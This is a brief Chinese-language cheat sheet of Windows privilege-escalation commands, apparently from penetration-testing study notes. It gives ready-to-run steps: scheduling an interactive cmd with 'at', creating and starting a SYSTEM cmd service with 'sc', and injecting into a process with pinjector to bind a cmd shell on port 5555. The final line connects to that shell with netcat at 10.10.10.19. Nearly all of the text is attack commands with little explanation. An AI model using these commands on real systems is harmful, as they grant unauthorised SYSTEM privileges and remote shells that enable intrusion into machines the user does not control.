- PsExec
- at
- Process_Injector
-
sc
psexec
當前用戶是jh
提權之後
*at命令提權(適用於xp,2003)
at 15:05 /interact cmd
sc
創建服務(打開cmd命令窗口的服務)
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
啓動服務剛纔創建的服務
sc start systemcmd
process_injector
列出當前的所有進程
pinjector.exe -l
選擇要提權成的用戶,進行進程注入
pinjector.exe -p 732 cmd 5555 #服務端實現進程注入
nc -nv 10.10.10.19 5555 # 客戶端連接服務端